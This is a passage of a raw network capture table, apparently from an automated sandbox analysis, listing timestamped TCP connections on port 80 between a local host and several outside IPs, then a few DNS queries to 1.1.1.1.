                                                                      Nov 6, 2024 05:23:51.834852934 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.834855080 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.835696936 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.835728884 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.835800886 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.835814953 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.835835934 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.835849047 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.835871935 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.883425951 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.953308105 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.953326941 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.953336000 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.953351021 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.953365088 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.953412056 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.953440905 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.953783035 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.953821898 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.953830957 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.953840971 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.953851938 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.953872919 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.954436064 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.954446077 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.954456091 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.954473019 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.954476118 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.954487085 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.954495907 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.954521894 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.991590023 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.991600037 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.991677046 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.072313070 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.072324038 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.072333097 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.072340965 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.072350025 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.072361946 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.072375059 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.072386980 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.072424889 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.072460890 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.073158979 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.073168993 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.073178053 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.073200941 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.073507071 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.073517084 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.073527098 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.073549032 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.073575974 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.156735897 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.156744957 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.156816959 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.190951109 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.190958977 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.191029072 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.191062927 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.191073895 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.191083908 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.191111088 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.191339016 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.191374063 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.191405058 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:52.191442966 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.195512056 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:52.200273991 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:57.390852928 CET5001680192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:23:57.395683050 CET805001652.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:23:57.396836996 CET5001680192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:23:57.408746004 CET5001680192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:23:57.413548946 CET805001652.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:23:58.064630032 CET805001652.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:23:58.099735022 CET805001652.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:23:58.099793911 CET5001680192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:23:58.916749001 CET5001680192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:23:59.934016943 CET5001780192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:23:59.939100981 CET805001752.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:23:59.939188957 CET5001780192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:23:59.951400042 CET5001780192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:23:59.956244946 CET805001752.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:00.607976913 CET805001752.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:00.642035961 CET805001752.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:00.644844055 CET5001780192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:01.468755007 CET5001780192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:02.484539032 CET5001880192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:02.489418983 CET805001852.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:02.489480972 CET5001880192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:02.499737024 CET5001880192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:02.504585981 CET805001852.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:02.504647017 CET805001852.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:03.153616905 CET805001852.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:03.187515020 CET805001852.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:03.188852072 CET5001880192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:04.008523941 CET5001880192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:05.027151108 CET5001980192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:05.032208920 CET805001952.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:05.032428026 CET5001980192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:05.039463043 CET5001980192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:05.044352055 CET805001952.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:05.691200018 CET805001952.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:05.724982023 CET805001952.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:05.725075960 CET5001980192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:05.726429939 CET5001980192.168.2.652.20.84.62
                                                                      Nov 6, 2024 05:24:05.731209993 CET805001952.20.84.62192.168.2.6
                                                                      Nov 6, 2024 05:24:10.760765076 CET5002080192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:10.765639067 CET80500203.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:10.768861055 CET5002080192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:10.780299902 CET5002080192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:10.785104990 CET80500203.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:11.469079018 CET80500203.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:11.472867012 CET5002080192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:12.289799929 CET5002080192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:12.294653893 CET80500203.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:13.308068991 CET5002180192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:13.313198090 CET80500213.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:13.313412905 CET5002180192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:13.323396921 CET5002180192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:13.328315020 CET80500213.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:13.970632076 CET80500213.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:13.970700979 CET5002180192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:14.836990118 CET5002180192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:14.841854095 CET80500213.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:15.856168032 CET5002280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:15.861105919 CET80500223.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:15.861175060 CET5002280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:15.871022940 CET5002280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:15.875859976 CET80500223.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:15.875962973 CET80500223.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:16.495515108 CET80500223.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:16.495563984 CET5002280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:17.384776115 CET5002280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:17.389630079 CET80500223.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:18.407777071 CET5002380192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:18.412699938 CET80500233.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:18.412775040 CET5002380192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:18.420304060 CET5002380192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:18.425144911 CET80500233.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:19.039012909 CET80500233.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:19.039585114 CET80500233.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:19.039875984 CET5002380192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:19.044789076 CET5002380192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:19.049808979 CET80500233.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:24.103409052 CET5002480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:24.108237028 CET80500243.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:24.108299017 CET5002480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:24.119405985 CET5002480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:24.124140978 CET80500243.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:25.633558989 CET5002480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:25.681576967 CET80500243.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:26.655602932 CET5002580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:26.660661936 CET80500253.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:26.664213896 CET5002580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:26.674861908 CET5002580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:26.679718018 CET80500253.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:27.355567932 CET80500253.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:27.355632067 CET5002580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:27.710964918 CET80500243.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:27.711024046 CET5002480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:28.180430889 CET5002580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:28.185290098 CET80500253.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:29.200795889 CET5002680192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:29.205821037 CET80500263.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:29.208873987 CET5002680192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:29.220798016 CET5002680192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:29.225615025 CET80500263.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:29.225830078 CET80500263.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:29.866445065 CET80500263.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:29.866493940 CET5002680192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:30.728801966 CET5002680192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:30.733752012 CET80500263.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:31.749094963 CET5002780192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:31.754134893 CET80500273.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:31.754215956 CET5002780192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:31.782250881 CET5002780192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:31.787066936 CET80500273.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:32.391520977 CET80500273.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:32.392445087 CET80500273.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:32.392496109 CET5002780192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:32.394702911 CET5002780192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:32.399503946 CET80500273.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:37.859164000 CET5002880192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:37.863993883 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:37.864058971 CET5002880192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:37.876487017 CET5002880192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:37.881371021 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764127970 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764162064 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764173985 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764187098 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764249086 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764264107 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764276028 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764285088 CET5002880192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:38.764286995 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764303923 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764316082 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.764358997 CET5002880192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:38.764502048 CET5002880192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:38.769097090 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.769181967 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.772878885 CET5002880192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:38.882874966 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.882889032 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.882900000 CET8050028162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:38.882952929 CET5002880192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:38.883048058 CET5002880192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:39.384797096 CET5002880192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:40.401853085 CET5002980192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:40.406918049 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:40.407011032 CET5002980192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:40.416984081 CET5002980192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:40.421837091 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248096943 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248270035 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248280048 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248291016 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248308897 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248320103 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248332977 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248342991 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248339891 CET5002980192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:41.248354912 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248366117 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.248390913 CET5002980192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:41.248390913 CET5002980192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:41.248445988 CET5002980192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:41.253330946 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.253343105 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.253353119 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.253446102 CET5002980192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:41.367332935 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.367948055 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.367958069 CET8050029162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:41.368076086 CET5002980192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:41.930464029 CET5002980192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:42.949141979 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:42.954052925 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:42.954226017 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:42.967011929 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:42.971831083 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:42.971930027 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854398966 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854412079 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854422092 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854434013 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854444027 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854454994 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854465008 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854465008 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:43.854474068 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854486942 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854499102 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.854502916 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:43.854521990 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:43.854541063 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:43.859493017 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.859504938 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.859514952 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.859524965 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.859560966 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:43.859600067 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:43.973054886 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.973064899 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.973071098 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.973077059 CET8050030162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:43.973133087 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:44.477423906 CET5003080192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:45.495877981 CET5003180192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:45.500858068 CET8050031162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:45.500986099 CET5003180192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:45.507786989 CET5003180192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:45.512613058 CET8050031162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:46.294603109 CET8050031162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:46.325968981 CET8050031162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:46.326045036 CET5003180192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:46.327421904 CET5003180192.168.2.6162.241.85.94
                                                                      Nov 6, 2024 05:24:46.332195044 CET8050031162.241.85.94192.168.2.6
                                                                      Nov 6, 2024 05:24:51.402956963 CET5003280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:51.407767057 CET80500323.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:51.410887957 CET5003280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:51.422821045 CET5003280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:51.427592039 CET80500323.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:52.100119114 CET80500323.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:52.100208998 CET5003280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:52.930927992 CET5003280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:52.935807943 CET80500323.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:53.949903965 CET5003380192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:53.954813957 CET80500333.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:53.954880953 CET5003380192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:53.967302084 CET5003380192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:53.972146034 CET80500333.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:54.582731009 CET80500333.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:54.582791090 CET5003380192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:55.477674007 CET5003380192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:55.482508898 CET80500333.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:56.496264935 CET5003480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:56.501327991 CET80500343.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:56.501385927 CET5003480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:56.513017893 CET5003480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:56.517836094 CET80500343.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:56.517894983 CET80500343.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:58.056725025 CET5003480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:58.062093973 CET80500343.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:58.062160969 CET5003480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:59.074209929 CET5003580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:59.079153061 CET80500353.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:59.079230070 CET5003580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:59.085975885 CET5003580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:59.090759039 CET80500353.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:59.706042051 CET80500353.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:59.706682920 CET80500353.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:24:59.706744909 CET5003580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:59.722505093 CET5003580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:24:59.727366924 CET80500353.33.130.190192.168.2.6
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 6, 2024 05:21:47.894628048 CET6536353192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:21:47.914592981 CET53653631.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:22:04.699282885 CET6480553192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:22:04.721555948 CET53648051.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:22:12.777313948 CET6111653192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:22:12.788316965 CET53611161.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:22:26.152328014 CET5671153192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:22:26.765037060 CET53567111.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:22:40.168040037 CET4983553192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:22:40.185020924 CET53498351.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:22:54.511655092 CET5538253192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:22:54.544785976 CET53553821.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:23:07.825095892 CET5613153192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:23:07.835295916 CET53561311.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:23:21.230719090 CET6442253192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:23:21.256381035 CET53644221.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:23:34.840718985 CET6340253192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:23:34.862298012 CET53634021.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:23:42.917772055 CET5309953192.168.2.61.1.1.1
